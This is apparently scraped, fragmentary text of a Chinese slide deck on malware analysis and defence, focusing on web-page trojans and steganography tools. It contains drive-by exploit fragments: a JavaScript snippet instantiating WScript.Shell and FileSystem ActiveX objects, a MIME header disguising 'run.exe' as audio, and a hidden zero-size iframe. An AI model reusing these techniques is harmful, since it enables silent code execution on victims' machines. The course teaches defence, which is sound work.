《网络安全后门教程PPT演示课件》由会员分享,可在线阅读,更多相关《网络安全后门教程PPT演示课件(63页珍藏版)》请在金锄头文库上搜索。
1、1,恶意软件(病毒)的分析与防范 Defence x.asp; x.htm,36,x.htm, 数据装载中,可能需要10秒至30秒. ,37,x.asp,1-在cache中寻找1.bmp 2-把bmp还原为exe 3-执行exe,38,正常网页中携带, Window.open Onload, onerror ,39,网页病毒、网页木马的原理,Javascript.Exception.Exploit :JS+WSH 错误的MIME Multipurpose Internet Mail Extentions,多用途的网际邮件扩充协议头. IE5.0到IE6.0 EXE to .BMP + Java
2、scritp.Exception.Exploit iframe 漏洞的利用:父窗口能在子域环境下运行脚本代码,包括任意的恶意代码 通过安全认证的CAB,COX EXE文件的捆绑,40,Javascript.Exception.Exploit,Function destroy()try a1=document.applets0; a1.setCLSID(F935DC22-1CF0-11D0-ADB9-00C04FD58A0B); a1.createInstance(); Shl = a1.GetObject(); a1.setCLSID(0D43FE01-F093-11CF-8940-00A0C
3、9054228); a1.createInstance(); FSO = a1.GetObject(); a1.setCLSID(F935DC26-1CF0-11D0-ADB9-00C04FD58A0B); a1.createInstance(); Net = a1.GetObject(); try do something; catch(e) catch(e) function do() setTimeout(destroy(), 1000); /设定运行时间1秒 do() /坏事执行函数指令,41,错误的MIME Multipurpose Internet Mail Extentions,
4、Content-Type: multipart/related;type=multipart/alternative“;boundary=”=B=“-=B=Content-Type: multipart/alternative;boundary=”=A=“-=A=Content-Type: text/html;Content-Transfer-Encoding: quoted-printable-=A=-=B=Content-Type: audio/x-wav;name=”run.exe“ -可以改为其他脚本文件Content-Transfer-Encoding: base64Content-
5、ID: -以下省略AAAAA N+1个-,当申明邮件 的类型为audio/x-wav时,IE存在的一个漏洞会将附件认为是音频文件自动尝试打开,42,iframe,iframe src=run.eml width=0 height=0/iframe,43,Startup.html, startup document.getElementById(clientcall).click() ,44,HTA的全名为HTML Application, 参见x.asp,45,各种溢出型漏洞,iframe溢出 Javaprxy.DLL COM对象堆溢出漏洞 ,46,木马的发展,加入Rootkit,隐藏文件/端
6、口/服务/进程等 HTTP隧道 HyDan(把信息隐藏在二进制文件中) ,47, ) Then% hidden data can be directly read off an audio CD. Includes encryption. Data Privacy Tools (Freeware) Uses BMP carrier files and includes encryption.,62,Hide information in a file,Data Stash (Shareware) - Uses BMP and database carrier files and include
7、s password protection. Digital Picture Envelope v1.0 (Freeware) - Uses BMP carrier files. Encrypt Pic (Shareware) - Uses 24-bit BMP carrier files and includes encryption. Gif-it-Up (Freeware) - Uses GIF carrier files and includes encryption. Gifshuffle v2.0 (Freeware) - A command-line tool that uses
8、 GIF carrier files and includes encryption. Hermetic Stego (Shareware) - Uses BMP carrier files. The developers claim their stego key makes the payload undetectable. Hide and Seek for Win95 (Shareware) - Uses BMP carrier files and includes encryption and file wiping. Hide4PGP v2.0 (Freeware) - A com
9、mand-line tool that uses BMP, WAV, and VOC carrier files. Hide In Picture 2.0 (Freeware) - USes BMP carrier files and includes encryption. ImageHide (Freeware) - Uses a variety of image carrier files. In Plain View (Freeware) - Uses BMP carrier files and includes password protection. In The Picture
10、(Shareware) - Uses BMP carrier files and includes encryption.,63,InfoStego (Freeware)- Uses BMP carrier files; includes encryption. Invisible Secrets v4.0 (Shareware) - Uses JPEG, PNG, BMP, HTML and WAV carrier files. Includes encryption, shredder, password manager and self-decrypting archives. JPeg
11、X (Freeware) - Uses JPEG carrier files and includes encryption and password protection. JP Hide and Seek (Freeware) - Uses JPEG carrier files and includes encryption. JSteg Shell v2.0 (Freeware) - Uses JPEG carrier files; includes encryption. MP3Stego (Freeware) - Uses MP3 carrier files. PGPn123 (Fr
12、eeware) - A tool that facilitates using PGP for Eudora, Agent, or Pegasus Mail and also includes a steganography option. PhotoCrypt 1.1 (Freeware) - Uses BMP carrier files. Sams Big Play Maker (Freeware) - A text generation tool that converts a message into an output that looks like a play. Scramdis
13、k (Freeware) - A disk encryption program that allows the creation and use of virtual encrypted drives. Scytale 32bit (Freeware) - A PGP shell program that uses PCX carrier files. SecurEngine 4.0 (Freeware) - Uses BMP, JPEG, WAV, and txt files as carrier files. Includes encryption, file wiping, a pas
14、sword manager, and self-decrypting archives. Stash-It v1.1 (Freeware) - Uses BMP, GIF, TIFF, PNG or PCX carrier files. Steghide 0.4.6b (Freeware) - Uses BMP, WAV and AU carrier files. Includes encryption. Stego-Lame (Freeware) - Uses various audio formats as carrier files. Written in Windows C sourc
15、e code; must be compiled before use. S-Tools 4 - (Freeware) - Uses BMP, GIF, and WAV carrier files; includes password and encryption options. The Third Eye (Freeware) - Uses BMP, GIF, and PCX carrier files and includes encryption wbStego4.3open (Freeware) - Uses BMP, TXT, HTML/XML, and PDF carrier files for both Windows and Unix. Includes a Wizard interface, encryption, and passphrase support. WeavWav (Freeware) - Uses WAV carrier files,
